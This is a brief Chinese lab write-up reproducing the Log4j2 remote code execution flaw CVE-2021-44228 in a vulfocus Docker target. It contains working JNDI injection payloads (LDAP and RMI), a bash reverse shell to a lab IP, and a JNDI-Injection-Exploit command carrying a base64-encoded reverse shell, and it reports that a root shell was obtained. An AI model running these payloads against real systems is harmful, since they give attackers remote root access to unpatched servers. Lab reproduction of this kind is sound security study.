2021-log4j2漏洞复现CVE-2021-44228-反弹shell

2021-log4j2漏洞复现CVE-2021-44228

2021年12月15日

12:03

   

该漏洞是最近新爆出的漏洞能够远程执行 命令：

该镜像本地可以搭建环境：

1、拉取一个docker镜像 docker pull vulfocus/log4j2-rce-2021-12-09

2、跑起来docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09

 

使用vulfocus可以搭建好环境：

访问该链接：

http://vulfocus.fofa.so:42044/hello

之后POST传入以下payload：

payload=${jndi:ldap://wdhcrj.dnslog.cn/exp}

回显回来了内容dnslog：

本地搭建环境，将镜像拉下来搭建好环境：

之后准备payload：

bash -i >& /dev/tcp/192.168.19.128/4444 0>&1

在kali/2021文件夹种有这个工具生成payload：

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5LjEyOC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.19.128"

尝试使用第一个payload：

payload=${jndi:rmi://192.168.19.128:1099/uctfqw}

再开一个终端可以回弹shell，有root权限：